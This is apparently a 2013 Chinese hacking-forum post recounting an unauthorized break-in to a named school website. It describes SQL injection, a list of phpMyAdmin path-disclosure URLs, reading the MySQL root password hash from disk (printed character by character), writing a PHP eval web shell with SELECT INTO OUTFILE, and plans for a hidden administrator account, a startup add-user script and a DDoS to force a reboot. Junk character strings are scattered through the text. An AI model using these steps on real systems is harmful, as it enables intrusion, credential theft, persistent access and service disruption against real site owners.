第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏9 X( s$ ^4 {0 o9 j+ s
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
U0 [" z# ?: Q+ O0 q) n, x
0 K$ K& ~3 y# w0 L: Q3 g& V3 J
`- F; M4 o+ q- k" b8 w+ o4 v; Y7 y+ L! x
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 0 u& U, l: S% f7 B. [
; l( `8 D3 W: H) _# a
那么想可以直接写入shell ,getshell有几个条件:
" S- J5 |- k8 V5 @1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
* A& b5 }4 y0 o7 v: D3 o/ |6 L
# l" @( w& n( W4 m, d3 c( a试着爆绝对路径:
% S2 d" }3 ]7 q1./phpMyAdmin/index.php?lang[]=1 : N- {4 U4 B$ @6 X! `. N
2./phpMyAdmin/phpinfo.php
6 A9 D, W( u9 e5 R" m3./load_file() - _, |4 [' j* o1 l* c. ?9 z
4./phpmyadmin/themes/darkblue_orange/layout.inc.php # j! f: d7 ?% N3 [* b
5./phpmyadmin/libraries/select_lang.lib.php 8 |0 Z f S- |. L& e# |
6./phpmyadmin/libraries/lect_lang.lib.php
U$ w# H" l3 l3 a, h1 p( \# g& h B7./phpmyadmin/libraries/mcrypt.lib.php 2 }+ N5 g$ I0 D6 n2 B
8./phpmyadmin/libraries/export/xls.php 9 t" u" b' F1 a0 C
5 ]0 a# m6 d7 R1 k8 j
均不行........................... ( I3 j$ n H3 |6 F* L1 w
' ^9 G4 `0 \% ?& D
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
1 O2 _: s7 Q) Q! D8 T5 c1 ?) S6 u* D4 `! D, N
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
* `8 u* P/ v3 J `4 X) ~% ?. G
7 g' }9 A+ t$ H u( X% ~默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ) Y1 c" P5 \! D' _ L# Y
( U- c( w' o$ q$ X- D3 D% `) q5 j
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
' @9 X% n8 M" }8 R/ g0 ^. r) z- A8 \
0 X8 J; `; V8 t7 B# [8 O D想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
) F: K4 R9 j4 R5 D$ I2 w4 t& U* u) d s
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
5 }2 C/ q& I4 l' V- W
, r" Y* U) F- H0 e: L9 X8 U自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
+ M- E8 I2 X* J. @% @
; Q* d2 L& p8 ?& i1 a1 z成功读到root密码: 2 G2 D, h7 M- A8 s; Y! L: u ~
6 J, c" u% [2 F& N3 t9 S
17---- r(0072) - g* b1 n l/ V
18---- o(006f)
7 ~, \9 \; N# r; e% R19---- o(006f)
2 j7 R5 r: E* i: C20---- t(0074)
( [: x; ?& ` ], Y+ @21---- *(002a) 4 J4 a$ w" }0 ~5 _
22---- 8(0038)
/ r1 d/ t3 H& P' O: ]! b23---- 2(0032)
2 p+ }3 u# f+ x7 M$ Z7 f24---- E(0045) + @1 q7 @0 V" X; n
25---- 1(0031)
; M" q' V' p2 ^' `' s9 T$ T/ k26---- C(0043) 8 C8 F4 f! q* R+ f$ q" f' c
27---- 5(0035) 1 l) R- K" T5 V9 R# B* k3 K
28---- 8(0038) " D7 P' c. F. F% H- R2 ^: u
29---- 2(0032)
: q+ }! u4 a! G7 z- e* ~; B30---- 8(0038)
1 d; X( b- Z6 M; x31---- A(0041)
/ k) ` v; W0 m0 F" k32---- 9(0039) 1 A! N* [( T- ?, T2 q
33---- B(0042)
. n: t; g( X" G" P7 D34---- 5(0035)
3 }+ w& \% b0 [! n$ J# V35---- 4(0034)
( s4 |4 Y. I% ]36---- 8(0038) * W6 V0 w2 c# L) \
37---- 6(0036) 5 m7 x7 N7 ]# X- z
38---- 4(0034)
& w6 s* {* t+ k2 `% n! m. q: Y39---- 9(0039) 3 |% h0 A: Q9 S
40---- 1(0031)
C* `' p% l- a8 h+ K/ |7 y& D2 C41---- 1(0031)
5 J" i4 H+ K V42---- 5(0035)
* y& V; q4 R$ @2 \1 |& o43---- 3(0033) . Y# y' B( s' X% B+ G
44---- 5(0035) ! S4 O l/ E/ T
45---- 9(0039) A4 S, X5 t( d( N
46---- 8(0038) + x6 t; ?" ?+ d+ Y5 g, m$ G" d& l8 X
47---- F(0046) 0 @: x5 c D* x4 |4 e( u3 p' }0 x
48---- F(0046)
+ z$ }; l Y( ?3 V$ A, J0 }- q1 ^49---- 4(0034) 8 q$ {0 ?* M# q' L, H
50---- F(0046) 2 K# A% Y8 _! e4 o8 G7 a5 g' U+ N
51---- 0(0030)
b) `( L8 ?. L& ?' j4 S& f% R52---- 3(0033) 7 N/ E% g$ A. e s8 R" X
53---- 2(0032)
, A! m- o: ]2 X0 E" g, ~9 y2 k54---- A(0041)
, J( \( b: j: }4 b0 t+ G% \+ W4 q55---- 4(0034) ! M" C0 C! E# Z# o
56---- A(0041)
; m# y1 C7 y: L, j3 E57---- B(0042)
R1 f3 I* t! o' q! G58---- *(0044)
9 P% L- u) b* z* V$ Q7 v3 \4 I59---- *(0035) ; S. s4 t8 x" }2 L
60---- *(0041)
5 n4 q G* H! Q% Y9 q6 i61---- *0032)
% Z: _7 r# E' E. n0 A7 t- h" F9 @% L; m2 D
解密后成功登陆phpmyamin 0 u+ A) W/ s. x8 M) k
! G: S5 R8 z, y% @4 L U3 S1 G
$ @2 W* m6 f5 F$ A 7 h$ C+ z5 F& Q; C& e- J
3 u' N% ?, I& i. b8 u. ~& F5 o找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
" D: t/ @5 f2 H# p1 U& W
5 F3 v3 w* M! n. ~+ [6 r N* z成功执行,拿下shell,菜刀连接:
/ v8 l; [8 I$ @; {
* U% v6 L! n k$ Q9 F服务器不支持asp,aspx,php提权无果...................
" ]7 z/ j1 v: R# W9 b* r
9 X6 V3 j/ _. a4 ]" |但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 4 \" O) {+ Q8 }3 {- i; V- s
服务器上已经有个隐藏帐号了 ! C- ]7 O4 Y+ O0 D* D0 t
别名 administrators
( i; A- @7 V! ^/ m9 I注释 管理员对计算机/域有不受限制的完全访问权
* f: U! U5 M# y/ R+ |) g成员
& G% v# P0 O! _: n7 ]-------------------------------------------------------------------------------9 S+ ?/ V3 b# X- j# W
admin
+ z: h% u/ @* E; b; c" I O& S6 w7 SAdministrator! ~1 [$ N0 U% T' D- X, f
slipper$% P2 L' X9 s) ~+ N. Q- S! S8 d! }
sqluser/ w/ i0 d1 c$ t7 g8 T* L4 y! \5 F! h
命令成功完成。
" M1 m- i7 v5 \3 O
$ @) R' n: }0 H3 s7 x& Z. S2 E7 i服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。; H$ @& R' N% X' t! V. j- G
4 ~, v+ w! G! c% {% uddos服务器重启,不然就只能坐等服务器重启了...............................% d/ k: P5 Q/ y
) m9 @2 D3 [& y& F 8 V6 Y, B$ B- T. o
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
